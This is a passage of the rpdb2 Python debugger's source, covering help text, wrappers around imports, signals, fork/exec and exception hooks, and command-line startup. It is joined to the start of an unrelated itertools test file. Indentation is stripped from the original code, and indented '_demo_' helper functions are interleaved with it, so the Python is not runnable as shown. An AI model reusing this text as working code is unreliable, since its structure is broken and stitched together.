<id_list> - is a space delimited list of at least one breakpoint id
'*' - clear all breakpoints.""", self.m_stdout)
def help_bl(self):
_print("""bl
List all breakpoints, sorted by their id.""", self.m_stdout)
def help_load(self):
_print("""load [<filename>]
Load breakpoints.
<filename> - optional breakpoints filename. The filename should not include
a file extension.""", self.m_stdout)
def help_save(self):
_print("""save [<filename>]
Save breakpoints.
<filename> - optional breakpoints filename. The filename should not include
a file extension.""", self.m_stdout)
def help_go(self):
_print("""go [[<filename>':'] (<line> | <scope>)]
(shorthand - g)
Resume execution of a script that is waiting at break point.
If an argument is present, continue execution until that location is reached.
<filename> - is the script's file name without the '.py' extension.
<line> - is the line number to assign the breakpoint to.
<scope> - is a "fully qualified" function name. That is, not only the
function name but also the class name (in case of a member
function), such as MyClass.MyMemberFunction.""", self.m_stdout)
help_g = help_go
def help_exit(self):
_print("""exit
Exit the debugger. If the debugger is attached to a script, the debugger
will attempt to detach from the script first.""", self.m_stdout)
help_EOF = help_exit
def help_host(self):
_print("""host [<arg>]
Without an argument, 'host' prints the current selected host.
With an argument <arg>, 'host' attempts to resolve <arg> to a known ip
address or a domain name. If it is successful, that host will become the
selected host.
The default selected host is the local host.
Subsequent 'attach' commands will be done on the selected host.
Type 'help attach' for more information.""", self.m_stdout)
def help_stack(self):
_print("""stack [<tid> | '*']
(shorthand - k)
Without an argument, 'stack' prints the stack trace of the focused thread.
If the thread is waiting at break point a special character will mark the
focused frame.
<tid> - print the stack of thread <tid>
'*' - print the stacks of all active threads.
Type 'help break' for more information on breakpoints and threads.
Type 'help up' or 'help down' for more information on focused frames.""", self.m_stdout)
help_k = help_stack
def help_list(self):
_print("""list [<file_name>:][<line_no> | '+' | '-' | '^' | '*'] [',' <nlines>]
(shorthand - l)
Without an argument, 'list' prints the source lines around the current line
of the focused thread in the focused frame. A special character sequence will
mark the current line according to the event:
'C>' - call - A function is called.
'L>' - line - The interpreter is about to execute a new line of code.
'R>' - return - A function is about to return.
'E>' - exception - An exception has been thrown.
'*>' - running - The thread is running.
If a breakpoint is assigned to a line, that line will be marked with:
'B' - if the breakpoint is enabled
'D' - if the breakpoint is disabled
<file_name> - List source from filename
<line_no> - Print the source lines around that line number in the same file
as the current line.
'+' - Print the next lines in the file.
'-' - Print the previous lines in the file.
'^' - Print the entire file.
'*' - Print the source lines for each of the active threads.
<nlines> - Print <nlines> of source
Type 'help break' for more information on breakpoints and threads.
Type 'help up' or 'help down' for more information on focused frames.""", self.m_stdout)
help_l = help_list
def help_thread(self):
_print("""thread [<no> | <tid>]
(shorthand - t)
Without an argument, 'thread' prints the list of known active threads, with
their corresponding state, which can be either 'running' or
'waiting at break point'. A special character will mark the focused thread.
With an argument <tid>, 'thread' will attempt to set the debugger focus to
the thread of that tid.
With an argument <no>, 'thread' will attempt to set the debugger focus to
the thread of that order in the thread list.
Type 'help break' for more information on breakpoints and threads.""", self.m_stdout)
help_t = help_thread
def help_jump(self):
_print("""jump <lineno>
(shorthand - j)
Jump to line <lineno> in the current scope.""", self.m_stdout)
help_j = help_jump
def help_next(self):
_print("""next
(shorthand - n)
Continue execution until the next line in the current function
is reached or it returns.""", self.m_stdout)
help_n = help_next
def help_step(self):
_print("""step
(shorthand - s)
Execute the current line, stop at the first possible occasion
(either in a function that is called or in the current function).""", self.m_stdout)
help_s = help_step
def help_return(self):
_print("""next
(shorthand - r)
Continue execution until the current function returns.""", self.m_stdout)
help_r = help_return
def help_up(self):
_print("""up
move the debugger focus one frame up the stack of the debugged thread
(closer to the current, most recently executed frame). Evaluation of
expressions or execution of statements will be done at the local and global
name spaces of the focused frame.
Type 'help eval' for more information on evaluation of expressions.
Type 'help exec' for more information on execution of statements.""", self.m_stdout)
def help_down(self):
_print("""down
move the debugger focus one frame down the stack of the debugged thread
(farther from the current, most recently executed frame). Evaluation of
expressions or execution of statements will be done at the local and global
name spaces of the focused frame.
Type 'help eval' for more information on evaluation of expressions.
Type 'help exec' for more information on execution of statements.""", self.m_stdout)
def help_eval(self):
_print("""eval <expr>
(shorthand - v)
Evaluate the python expression <expr> under the global and local name spaces
of the currently focused frame.
Example:
'eval locals()' - will display the dictionary of the local variables.
IMPORTANT: Any changes to the global name space will be discarded unless the
focused stack frame is the top most frame.
Type 'help up' or 'help down' for more information on focused frames.""", self.m_stdout)
help_v = help_eval
def help_exec(self):
_print("""exec <stmt>
(shorthand - x)
Execute the python suite <stmt> under the global and local name spaces
of the currently focused frame.
Example:
'exec i += 1'
IMPORTANT: Any changes to the global name space will be discarded unless the
focused stack frame is the top most frame.
Type 'help up' or 'help down' for more information on focused frames.""", self.m_stdout)
help_x = help_exec
def help_encoding(self):
_print("""encoding [<encoding> [, raw]]
Set the source encoding for the exec and eval commands.
Without an argument returns the current encoding.
The specified encoding can be either 'auto' or any encoding accepted
by the codecs module. If 'auto' is specified, the source encoding of
the active scope will be used, which is utf-8 by default.
The default encoding value is 'auto'.
If 'raw' is specified, strings returned by the eval command
will represent non-ASCII characters as escape sequences.""", self.m_stdout)
def help_env(self):
_print("""env [-d key | key = value]
Set the environment variables mapping. This mapping is used
when a new script is launched to modify its environment.
Example for a mapping on Windows:
env Path = %Path%;c:\\mydir
Example for a mapping on Linux:
env PATH = $PATH:~/mydir
To delete the mapping for PATH
env -d PATH
Without an argument returns the current list of mappings.
Note that the mapping will be evaluated and used to modify
the environment after the debugger engine at the debuggee
has imported the modules it requires. The order in which the
mappings will be evaluated and applied is:
last set, last evaluated.""", self.m_stdout)
#
# ---------------------------------------- Replacement Functions ------------------------------------
#
def rpdb2_import_wrapper(*args, **kwargs):
if len(args) > 0:
name = args[0]
elif 'name' in kwargs:
name = kwargs['name']
else:
return g_import(*args, **kwargs)
if name in sys.modules:
return g_import(*args, **kwargs)
#
# rpdb2 avoids stepping through this
# function (rpdb2_import_wrapper) to
# prevent confusion when stepping into
# an import statement.
#
m = g_import(*args, **kwargs)
if name != 'gtk':
return m
try:
m.gdk.threads_init()
return m
except:
pass
try:
m.threads_init()
return m
except:
pass
return m
g_import = None
if __name__ == 'rpdb2' and g_builtins_module.__import__ != rpdb2_import_wrapper:
g_import = g_builtins_module.__import__
g_builtins_module.__import__ = rpdb2_import_wrapper
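#
# The block above saves the interpreter's original __import__ and installs
# rpdb2_import_wrapper in its place so the debugger can react to first-time
# imports (here: initialising gtk threading).  The helper below is a minimal,
# hedged sketch of that generic hook pattern; it is illustrative only, the
# _demo_* names are not part of rpdb2, and it assumes Python 3 ('builtins').
#
def _demo_install_import_hook(callback):
    # Wrap builtins.__import__ so callback(name) runs after a module is
    # imported for the first time.  Returns a function that undoes the hook.
    import builtins
    import sys
    original_import = builtins.__import__
    def _hooked_import(name, *args, **kwargs):
        first_time = name not in sys.modules
        module = original_import(name, *args, **kwargs)
        if first_time:
            callback(name)
        return module
    builtins.__import__ = _hooked_import
    def _undo():
        builtins.__import__ = original_import
    return _undo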
def __find_eval_exec_frame_in_stack():
f = sys._getframe(0)
while f != None:
filename = f.f_code.co_filename
name = f.f_code.co_name
if DEBUGGER_FILENAME in filename and name in ['_evaluate', '_execute'] and 'redirect_exc_info' in f.f_locals:
return f
f = f.f_back
return None
def __exc_info():
f = __find_eval_exec_frame_in_stack()
if f == None:
return g_sys_exc_info()
try:
frame_index = f.f_locals['frame_index']
fException = f.f_locals['fException']
e = g_debugger.get_exception(frame_index, fException)
exc_info = (e['type'], e['value'], e['traceback'])
return exc_info
except:
return g_sys_exc_info()
g_sys_exc_info = None
if __name__ == 'rpdb2' and 'exc_info' in dir(sys) and sys.exc_info != __exc_info:
g_sys_exc_info = sys.exc_info
sys.exc_info = __exc_info
def __setrecursionlimit(rl):
global g_recursionlimit
print_debug('rl = %d' % rl)
g_recursionlimit = max(rl, 64)
rl = g_recursionlimit
if sys.version_info[:2] == (2, 6):
rl *= 3
return g_sys_setrecursionlimit(rl + 64)
g_sys_setrecursionlimit = None
if __name__ == 'rpdb2' and 'setrecursionlimit' in dir(sys) and sys.setrecursionlimit != __setrecursionlimit:
g_sys_setrecursionlimit = sys.setrecursionlimit
sys.setrecursionlimit = __setrecursionlimit
__setrecursionlimit(sys.getrecursionlimit())
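#
# Why the padding above: while a sys.settrace trace function is active, every
# user-level call carries additional debugger frames, so a script that runs
# close to the recursion limit could start hitting RecursionError only when
# debugged.  The helper below is an illustrative, standalone measurement (not
# part of rpdb2, Python 3 assumed); calling it with and without a trace
# function installed shows the headroom the padding compensates for.
#
def _demo_max_recursion_depth():
    # Recurse until RecursionError and report how deep we got.
    def _recurse(depth):
        try:
            return _recurse(depth + 1)
        except RecursionError:
            return depth
    return _recurse(0)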
def __find_debugger_frame():
frame = None
f = sys._getframe(0)
while f != None:
filename = f.f_code.co_filename
name = f.f_code.co_name
if DEBUGGER_FILENAME in filename and (name.startswith('trace_dispatch') or name == 'profile'):
frame = f
f = f.f_back
return frame
class CSignalHandler:
def __del__(self):
while len(g_signals_pending) != 0:
(handler, signum, frameobj) = g_signals_pending.pop(0)
print_debug('Handling pending signal: %s, %s' % (repr(signum), repr(frameobj)))
try:
handler(signum, frameobj)
except:
#
# Cannot raise from inside a destructor. Report that the handler
# exception will be ignored.
#
(t, v, tb) = sys.exc_info()
_t = safe_repr(t)
if _t.startswith("<type '"):
_t = _t.split("'")[1]
event = CEventSignalException(signum, '%s: %s' % (_t, safe_repr(v)))
g_debugger.m_event_dispatcher.fire_event(event)
def signal_handler(signum, frameobj):
frame = __find_debugger_frame()
if frame == None:
#
# A debugger tracing frame was not found in the stack.
# This means that the handler can be run without risk
# of state corruption.
#
handler = signal.getsignal(signum)
return handler(signum, frameobj)
if frame.f_code.co_name == 'profile' and frame.f_locals['event'] != 'return':
#
# signal was caught inside the profile hook but not while
# doing some debugger stuff. Call the handler but in case
# of exception schedule the debugger to re-enable the
# profile hook.
#
try:
handler = signal.getsignal(signum)
return handler(signum, frameobj)
except:
ctx = g_debugger.get_ctx(thread.get_ident())
ctx.set_tracers(fsignal_exception = True)
raise
#
# Set the handler to be run when the debugger is about
# to return from the tracing code.
#
print_debug('Intercepted signal: %s, %s' % (repr(signum), repr(frameobj)))
f = frameobj
while f != None:
if f == frame:
frameobj = frame.f_back
break
f = f.f_back
handler = signal.getsignal(signum)
g_signals_pending.append((handler, signum, frameobj))
if not 'signal_handler' in frame.f_locals:
frame.f_locals.update({'signal_handler': CSignalHandler()})
event = CEventSignalIntercepted(signum)
g_debugger.m_event_dispatcher.fire_event(event)
if signum == signal.SIGINT and g_debugger.is_waiting_for_attach():
g_debugger.set_request_go_timer(0)
def __getsignal(signum):
handler = g_signal_handlers.get(signum, g_signal_getsignal(signum))
return handler
g_signal_getsignal = None
if __name__ == 'rpdb2' and 'getsignal' in dir(signal) and signal.getsignal != __getsignal:
g_signal_getsignal = signal.getsignal
signal.getsignal = __getsignal
def __signal(signum, handler):
old_handler = __getsignal(signum)
if handler in [signal.SIG_IGN, signal.SIG_DFL]:
g_signal_signal(signum, handler)
return old_handler
g_signal_signal(signum, signal_handler)
g_signal_handlers[signum] = handler
return old_handler
g_signal_signal = None
if __name__ == 'rpdb2' and 'signal' in dir(signal) and signal.signal != __signal:
g_signal_signal = signal.signal
signal.signal = __signal
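#
# The signal machinery above defers the real handler by dropping a
# CSignalHandler sentinel into the tracing frame's locals; its __del__ runs
# the pending handlers once the debugger frames unwind.  Below is a minimal,
# standalone sketch of that "run callbacks when a frame lets go of an object"
# trick; _DemoOnRelease is illustrative only and is not used by rpdb2.
#
class _DemoOnRelease(object):
    # Invoke the stored callbacks when this object is finalized, e.g. when
    # the frame holding the only reference to it exits.
    def __init__(self, callbacks):
        self.m_callbacks = list(callbacks)
    def __del__(self):
        for callback in self.m_callbacks:
            try:
                callback()
            except Exception:
                # Exceptions must not propagate out of a destructor.
                pass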
"""
def __setprofile(foo):
global g_profile
print_debug('*** setprofile to %s' % repr(foo))
traceback.print_stack(file = sys.__stderr__)
if thread_get_name(current_thread()) == 'MainThread':
g_profile = foo
g_sys_setprofile(foo)
g_sys_setprofile = None
if __name__ == 'rpdb2' and sys.setprofile != __setprofile:
g_sys_setprofile = sys.setprofile
sys.setprofile = __setprofile
"""
def __fork():
global g_forktid
if not g_fignorefork:
g_forktid = setbreak()
#
# os.fork() has been called.
#
# You can choose if you would like the debugger
# to continue with the parent or child fork with
# the 'fork' console command.
#
# For example: 'fork child' or 'fork parent'
# Type: 'help fork' for more information.
#
# WARNING:
# On some Posix OS such as FreeBSD,
# stepping into the child fork can result in
# termination of the child process.
#
# *** RPDB2 SAYS: Read the entire comment! ***
#
return g_os_fork()
g_os_fork = None
if __name__ == 'rpdb2' and 'fork' in dir(os) and os.fork != __fork:
g_os_fork = os.fork
os.fork = __fork
def __exit(n):
global g_fos_exit
if type(n) == int:
g_fos_exit = (setbreak() != None)
#
# os._exit(n) has been called.
#
# Stepping on from this point will result
# in program termination.
#
return g_os_exit(n)
g_os_exit = None
if __name__ == 'rpdb2' and '_exit' in dir(os) and os._exit != __exit:
g_os_exit = os._exit
os._exit = __exit
def __close(fd):
global g_fos_exit
try:
if fd == g_server.m_server.socket._sock.fileno():
g_fos_exit = (setbreak() != None)
except:
pass
#
# os.close(fd) has been called by the debugged script to close
# the debugger communication channel.
#
# This can normally happen if it is trying to spawn a new process
# in its place.
#
# Stepping on from this point will result in termination of the
# debugging session.
#
return g_os_close(fd)
g_os_close = None
if __name__ == 'rpdb2' and 'close' in dir(os) and os.close != __close:
g_os_close = os.close
os.close = __close
def __dup2(fd, fd2):
global g_fos_exit
try:
if fd2 == g_server.m_server.socket._sock.fileno():
g_fos_exit = (setbreak() != None)
except:
pass
#
# os.dup2(fd, fd2) has been called by the debugged script to close
# the debugger communication channel.
#
# This can normally happen if it is trying to spawn a new process
# in its place.
#
# Stepping on from this point will result in termination of the
# debugging session.
#
return g_os_dup2(fd, fd2)
g_os_dup2 = None
if __name__ == 'rpdb2' and 'dup2' in dir(os) and os.dup2 != __dup2:
g_os_dup2 = os.dup2
os.dup2 = __dup2
def __execv(path, args):
global g_exectid
if os.path.isfile(path) and not g_fignorefork:
g_exectid = setbreak()
#
# os.execv() has been called.
#
# Stepping on from this point will result
# in termination of the debug session if
# the exec operation completes successfully.
#
return g_os_execv(path, args)
g_os_execv = None
if __name__ == 'rpdb2' and 'execv' in dir(os) and os.execv != __execv:
g_os_execv = os.execv
os.execv = __execv
def __execve(path, args, env):
global g_exectid
if os.path.isfile(path) and not g_fignorefork:
g_exectid = setbreak()
#
# os.execve() has been called.
#
# Stepping on from this point will result
# in termination of the debug session if
# the exec operation completes successfully.
#
return g_os_execve(path, args, env)
g_os_execve = None
if __name__ == 'rpdb2' and 'execve' in dir(os) and os.execve != __execve:
g_os_execve = os.execve
os.execve = __execve
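#
# __fork, __exit, __close, __dup2, __execv and __execve above all follow the
# same pattern: keep the original os-level function in a g_os_* global and
# install a thin wrapper that lets the debugger break before delegating.  The
# helper below is a hedged, generic sketch of that pattern with illustrative
# names only; it is not part of rpdb2.
#
def _demo_wrap_function(module, name, before_call):
    # Replace module.<name> with a wrapper that calls before_call() first,
    # then delegates to the original.  Returns a restore function.
    original = getattr(module, name)
    def _wrapper(*args, **kwargs):
        before_call()
        return original(*args, **kwargs)
    setattr(module, name, _wrapper)
    def _restore():
        setattr(module, name, original)
    return _restore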
def __excepthook(type, value, traceback, next_excepthook, index):
if index + 1 < len(g_excepthooks):
return next_excepthook(type, value, traceback)
if traceback.tb_frame.f_back == None:
return next_excepthook(type, value, traceback)
if not g_debugger.m_ftrap:
return next_excepthook(type, value, traceback)
settrace()
ctx = g_debugger.get_ctx(thread.get_ident())
ctx.m_fUnhandledException = True
setbreak()
#
# Debuggee breaks (pauses) here
# on unhandled exceptions.
# Use analyze mode for post mortem.
# type 'help analyze' for more information.
#
return next_excepthook(type, value, traceback)
g_excepthooks = []
g_excepthook = None
#
# Set the debugger hook for unhandled exceptions. It only kicks in on
# unhandled exceptions that are declared unhandled in the middle of the
# stack as in wxPython. Normally unhandled exceptions are trapped at the
# last stack frame by another mechanism.
#
# This mechanism is designed to work even if the excepthook is overwritten
# by the debugged script.
#
def set_excepthook():
global g_excepthook
if len(g_excepthooks) >= 4:
#
# Give up. We have been overwritten 4 times already.
#
return
next_excepthook = sys.excepthook
index = len(g_excepthooks)
eh = lambda type, value, traceback: __excepthook(type, value, traceback, next_excepthook, index)
g_excepthooks.append(eh)
g_excepthook = eh
sys.excepthook = eh
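#
# set_excepthook above chains a fresh hook in front of whatever sys.excepthook
# happens to be, so the debugger still sees unhandled exceptions even after
# the debugged script replaces the hook (it gives up after four replacements).
# A minimal sketch of chaining one hook while delegating to the previous one
# is shown below; _demo_chain_excepthook is illustrative only, not part of
# rpdb2.
#
def _demo_chain_excepthook(on_exception):
    # Install a hook that notifies on_exception() and then defers to the
    # hook that was active before us.  Returns the previous hook.
    import sys
    previous_hook = sys.excepthook
    def _hook(exc_type, exc_value, exc_traceback):
        try:
            on_exception(exc_type, exc_value, exc_traceback)
        finally:
            previous_hook(exc_type, exc_value, exc_traceback)
    sys.excepthook = _hook
    return previous_hook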
def __function_wrapper(function, args, kwargs):
__settrace(depth = 1)
#
# Debuggee breaks (pauses) here
# on unhandled exceptions.
# Use analyze mode for post mortem.
# type 'help analyze' for more information.
#
return function(*args, **kwargs)
def __start_new_thread(function, args, kwargs = {}):
return g_thread_start_new_thread(__function_wrapper, (function, args, kwargs))
g_thread_start_new_thread = None
if __name__ == 'rpdb2' and 'start_new_thread' in dir(thread) and thread.start_new_thread != __start_new_thread:
g_thread_start_new_thread = thread.start_new_thread
thread.start_new_thread = __start_new_thread
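#
# The wrapper above makes sure threads created through the low-level thread
# module start tracing before running user code.  For threads created via the
# threading module, the standard library offers threading.settrace(); the
# sketch below shows that simpler route (illustrative only, not how rpdb2
# itself hooks threads).
#
def _demo_trace_new_threads(trace_function):
    # Ask the threading module to install trace_function (same signature as
    # for sys.settrace) in every thread started after this call.
    import threading
    threading.settrace(trace_function)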
#
# ---------------------------------------- main ------------------------------------
#
def __settrace(depth = 2):
if g_debugger is None:
return
f = sys._getframe(depth)
g_debugger.settrace(f, f_break_on_init = False)
def __setbreak(depth = 2):
if g_debugger is None:
return
f = sys._getframe(depth)
g_debugger.setbreak(f)
return thread.get_ident()
def __set_temp_breakpoint(path, scopename, lineno):
return g_debugger.m_bp_manager.set_temp_breakpoint(path, scopename, lineno)
def _atexit(fabort = False):
if g_fignore_atexit:
return
print_debug("Entered _atexit() in pid %d" % _getpid())
if g_debugger is None:
return
if not fabort:
g_debugger.stoptrace()
g_debugger.send_event_exit()
time.sleep(1.0)
g_server.shutdown()
g_debugger.shutdown()
if not fabort:
return
if hasattr(os, 'kill') and hasattr(signal, 'SIGKILL'):
os.kill(os.getpid(), signal.SIGKILL)
else:
os.abort()
def my_pickle_import(*args, **kwargs):
name = ''
if len(args) > 0:
name = args[0]
if 'name' in kwargs:
name = kwargs['name']
if name == 'rpdb2':
return
return __import__(*args, **kwargs)
#
# MOD
#
def workaround_import_deadlock():
if is_py3k() and hasattr(pickle, '_Pickler'):
pickle.Pickler = pickle._Pickler
xmlrpclib.loads(XML_DATA)
s = as_bytes("(S'hello'\np0\nS'world'\np1\ntp2\n.")
#s = as_bytes('(S\'\\xb3\\x95\\xf9\\x1d\\x105c\\xc6\\xe2t\\x9a\\xa5_`\\xa59\'\np0\nS"(I0\\nI1\\nS\'5657827\'\\np0\\n(S\'server_info\'\\np1\\n(tI0\\ntp2\\ntp3\\n."\np1\ntp2\n.0000000')
pickle.loads(s)
pickle.__import__ = my_pickle_import
def __start_embedded_debugger(_rpdb2_pwd, fAllowUnencrypted, fAllowRemote, timeout, source_provider, fDebug, depth):
global g_server
global g_debugger
global g_fDebug
global g_initial_cwd
global g_source_provider_aux
_rpdb2_pwd = as_unicode(_rpdb2_pwd)
try:
g_server_lock.acquire()
if g_debugger is not None and timeout == 0:
f = sys._getframe(depth)
g_debugger.settrace(f, f_break_on_init = False)
return
if g_debugger is not None:
f = sys._getframe(depth)
g_debugger.record_client_heartbeat(0, True, False)
g_debugger.setbreak(f)
return
if not is_valid_pwd(_rpdb2_pwd):
raise BadArgument(STR_PASSWORD_BAD)
g_fDebug = fDebug
g_source_provider_aux = source_provider
workaround_import_deadlock()
if (not fAllowUnencrypted) and not is_encryption_supported():
raise EncryptionNotSupported
f = sys._getframe(depth)
filename = calc_frame_path(f)
#
# This is an attempt to address the Python problem of recording only
# relative paths in __file__ members of modules in the following case.
#
if sys.path[0] == '':
try:
g_initial_cwd = [getcwd(), getcwdu()]
except UnicodeDecodeError:
#
# This exception can be raised in py3k (alpha) on nt.
#
g_initial_cwd = [getcwdu()]
atexit.register(_atexit)
g_debugger = CDebuggerEngine(fembedded = True)
g_server = CDebuggeeServer(filename, g_debugger, _rpdb2_pwd, fAllowUnencrypted, fAllowRemote)
g_server.start()
if timeout == 0:
g_debugger.settrace(f, f_break_on_init = False)
return
g_debugger.settrace(f, timeout = timeout)
finally:
g_server_lock.release()
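#
# For reference, a typical way a user script enables the embedded debugger
# (a hedged example: it assumes the public start_embedded_debugger() wrapper
# defined earlier in this module, and 'some_password' is a placeholder):
#
def _demo_embedded_debugger_usage():
    # Place these two lines where the script should pause and wait for an
    # rpdb2 console to attach with the same password.
    import rpdb2
    rpdb2.start_embedded_debugger('some_password')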
def StartServer(args, fchdir, _rpdb2_pwd, fAllowUnencrypted, fAllowRemote, rid):
assert(is_unicode(_rpdb2_pwd))
global g_server
global g_debugger
global g_module_main
try:
ExpandedFilename = FindFile(args[0])
_path = g_found_unicode_files.get(ExpandedFilename, ExpandedFilename)
if fchdir:
os.chdir(os.path.dirname(_path))
if ExpandedFilename in g_found_unicode_files:
prefix = os.path.join(getcwdu(), '')
_path = _path.replace(winlower(prefix), '')
except IOError:
_print('File ' + args[0] + ' not found.')
return
print_debug('Starting server with: %s' % ExpandedFilename)
workaround_import_deadlock()
#
# Replace the rpdb2.py directory with the script directory in
# the search path
#
spe = ExpandedFilename
if os.path.islink(ExpandedFilename):
spe = os.path.realpath(ExpandedFilename)
sys.path[0] = os.path.dirname(spe)
encoding = detect_locale()
argv = [as_string(arg, encoding) for arg in args]
sys.argv = argv
atexit.register(_atexit)
g_debugger = CDebuggerEngine()
g_server = CDebuggeeServer(ExpandedFilename, g_debugger, _rpdb2_pwd, fAllowUnencrypted, fAllowRemote, rid)
g_server.start()
try:
g_debugger.m_bp_manager.set_temp_breakpoint(ExpandedFilename, '', 1, fhard = True)
except:
pass
f = sys._getframe(0)
g_debugger.settrace(f, f_break_on_init = False, builtins_hack = ExpandedFilename)
g_module_main = -1
del sys.modules['__main__']
#
# An exception in this line occurs if
# there is a syntax error in the debugged script or if
# there was a problem loading the debugged script.
#
imp.load_source('__main__', _path)
def StartClient(command_line, fAttach, fchdir, _rpdb2_pwd, fAllowUnencrypted, fAllowRemote, host):
assert(is_unicode(command_line))
assert(_rpdb2_pwd == None or is_unicode(_rpdb2_pwd))
if (not fAllowUnencrypted) and not is_encryption_supported():
_print(STR_ENCRYPTION_SUPPORT_ERROR)
return 2
sm = CSessionManager(_rpdb2_pwd, fAllowUnencrypted, fAllowRemote, host)
c = CConsole(sm)
c.start()
time.sleep(1.0)
try:
if fAttach:
sm.attach(command_line)
elif command_line != '':
sm.launch(fchdir, command_line)
except (socket.error, CConnectionException):
sm.report_exception(*sys.exc_info())
except CException:
sm.report_exception(*sys.exc_info())
except:
sm.report_exception(*sys.exc_info())
print_debug_exception(True)
c.join()
sm.shutdown()
def PrintUsage(fExtended = False):
scriptName = os.path.basename(sys.argv[0])
_print(""" %(rpdb)s [options] [<script-name> [<script-args>...]]
%(rpdb)s uses the client-server model where the debugger UI/console is
the client and the debugged script is the server (also called debuggee).
The client and the server are separate processes and communicate over
sockets.
Example: The following command starts the debugger UI/console and then
launches and attaches to the specified script:
%(rpdb)s some_script.py
Options can be a combination of the following:
-h, --help Print this help.
-d, --debuggee Start the debugged script (server) and wait for a
debugger console (client) to attach.
-a, --attach Start the debugger console (client) and attach to the
specified debugged script (server).
-o, --host= Specify host (or IP address) for remote connections.
-r, --remote Allow debuggees to accept connections from remote machines.
-e, --encrypt Force encrypted socket communication.
-p, --pwd= Specify password for socket communication.
This flag is available only on Windows. On other
systems the password will be queried interactively
if it is needed.
-s, --screen Use the Unix screen utility when starting the debuggee.
Note that the debugger should be started as follows:
screen rpdb2 -s [options] [<script-name> [<script-args>...]]
-c, --chdir Change the working directory to that of the launched
script.
-v, --version Print version information.
--debug Debug prints.
Note that each option is available in short form (example -e) and in a
long form (example --encrypt).
Options that end with '=' accept an argument that should follow without
a space. For example to specify 192.168.0.10 as host use the following
option:
long form: --host=192.168.0.10
short form: -o192.168.0.10
""" % {"rpdb": scriptName})
if not fExtended:
return
_print(__doc__)
def main(StartClient_func = StartClient, version = RPDB_TITLE):
global g_fScreen
global g_fDebug
global g_fFirewallTest
create_rpdb_settings_folder()
encoding = detect_locale()
argv = [as_unicode(arg, encoding) for arg in sys.argv]
try:
options, _rpdb2_args = getopt.getopt(
argv[1:],
'hdao:rtep:scv',
['help', 'debugee', 'debuggee', 'attach', 'host=', 'remote', 'plaintext', 'encrypt', 'pwd=', 'rid=', 'screen', 'chdir', 'base64=', 'nofwtest', 'version', 'debug']
)
except getopt.GetoptError:
PrintUsage()
return 2
fWrap = False
fAttach = False
fSpawn = False
fStart = False
encoded_path = None
secret = None
host = None
_rpdb2_pwd = None
fchdir = False
fAllowRemote = False
fAllowUnencrypted = True
for o, a in options:
if o in ['-h', '--help']:
PrintUsage()
return 0
if o in ['-v', '--version']:
_print(version)
return 0
if o in ['--debug']:
g_fDebug = True
if o in ['-d', '--debugee', '--debuggee']:
fWrap = True
if o in ['-a', '--attach']:
fAttach = True
if o in ['-o', '--host']:
host = a
if o in ['-r', '--remote']:
fAllowRemote = True
if o in ['-t', '--plaintext']:
fAllowUnencrypted = True
if o in ['-e', '--encrypt']:
fAllowUnencrypted = False
if o in ['-p', '--pwd']:
_rpdb2_pwd = a
if o in ['--rid']:
secret = a
if o in ['-s', '--screen']:
g_fScreen = True
if o in ['-c', '--chdir']:
fchdir = True
if o in ['--base64']:
encoded_path = a
if o in ['--nofwtest']:
g_fFirewallTest = False
arg = None
argv = None
options = None
o = None
a = None
if (_rpdb2_pwd is not None) and (os.name != 'nt'):
_print(STR_PASSWORD_NOT_SUPPORTED)
return 2
if _rpdb2_pwd is not None and not is_valid_pwd(_rpdb2_pwd):
_print(STR_PASSWORD_BAD)
return 2
if fWrap and (len(_rpdb2_args) == 0):
_print("--debuggee option requires a script name with optional <script-arg> arguments")
return 2
if fWrap and fAttach:
_print("--debuggee and --attach can not be used together.")
return 2
if fAttach and (len(_rpdb2_args) == 0):
_print("--attach option requires a script name to attach to.")
return 2
if fAttach and (len(_rpdb2_args) > 1):
_print("--attach option does not accept <script-arg> arguments.")
return 2
if fAttach and fAllowRemote:
_print("--attach and --remote can not be used together.")
return 2
if (host is not None) and not fAttach:
_print("--host can only be used together with --attach.")
return 2
if host is None:
host = LOCALHOST
fSpawn = (len(_rpdb2_args) != 0) and (not fWrap) and (not fAttach)
fStart = (len(_rpdb2_args) == 0)
if fchdir and not (fWrap or fSpawn):
_print("-c can only be used when launching or starting a script from command line.")
return 2
assert (fWrap + fAttach + fSpawn + fStart) == 1
if fAttach and (os.name == POSIX):
try:
int(_rpdb2_args[0])
_rpdb2_pwd = read_pwd_file(_rpdb2_args[0])
delete_pwd_file(_rpdb2_args[0])
except (ValueError, IOError):
pass
if (secret is not None) and (os.name == POSIX):
_rpdb2_pwd = read_pwd_file(secret)
if (fWrap or fAttach) and not is_valid_pwd(_rpdb2_pwd):
_print(STR_PASSWORD_MUST_BE_SET)
while True:
_rpdb2_pwd = _raw_input(STR_PASSWORD_INPUT)
if is_valid_pwd(_rpdb2_pwd):
break
_print(STR_PASSWORD_BAD)
_print(STR_PASSWORD_CONFIRM)
if fWrap or fSpawn:
try:
if encoded_path != None:
_b = as_bytes(encoded_path).translate(g_safe_base64_from)
_u = base64.decodestring(_b)
_path = as_unicode(_u)
_rpdb2_args[0] = _path
FindFile(_rpdb2_args[0])
except IOError:
_print(STR_FILE_NOT_FOUND % _rpdb2_args[0])
return 2
if fWrap:
if (not fAllowUnencrypted) and not is_encryption_supported():
_print(STR_ENCRYPTION_SUPPORT_ERROR)
return 2
StartServer(_rpdb2_args, fchdir, _rpdb2_pwd, fAllowUnencrypted, fAllowRemote, secret)
elif fAttach:
StartClient_func(_rpdb2_args[0], fAttach, fchdir, _rpdb2_pwd, fAllowUnencrypted, fAllowRemote, host)
elif fStart:
StartClient_func(as_unicode(''), fAttach, fchdir, _rpdb2_pwd, fAllowUnencrypted, fAllowRemote, host)
else:
if len(_rpdb2_args) == 0:
_rpdb2_args = ''
else:
_rpdb2_args = '"' + '" "'.join(_rpdb2_args) + '"'
StartClient_func(_rpdb2_args, fAttach, fchdir, _rpdb2_pwd, fAllowUnencrypted, fAllowRemote, host)
return 0
if __name__ == '__main__':
import rpdb2
#
# Debuggee breaks (pauses) here
# on unhandled exceptions.
# Use analyze mode for post mortem.
# type 'help analyze' for more information.
#
ret = rpdb2.main()
#
# Debuggee breaks (pauses) here
# before program termination.
#
# You can step to debug any exit handlers.
#
rpdb2.setbreak()
|
test_itertools.py
|
import unittest
from test import support
from itertools import *
import weakref
from decimal import Decimal
from fractions import Fraction
import operator
import random
import copy
import pickle
from functools import reduce
import sys
import struct
import threading
import gc
maxsize = support.MAX_Py_ssize_t
minsize = -maxsize-1
def lzip(*args):
return list(zip(*args))
def onearg(x):
'Test function of one argument'
return 2*x
def errfunc(*args):
'Test function that raises an error'
raise ValueError
def gen3():
'Non-restartable source sequence'
for i in (0, 1, 2):
yield i
def isEven(x):
'Test predicate'
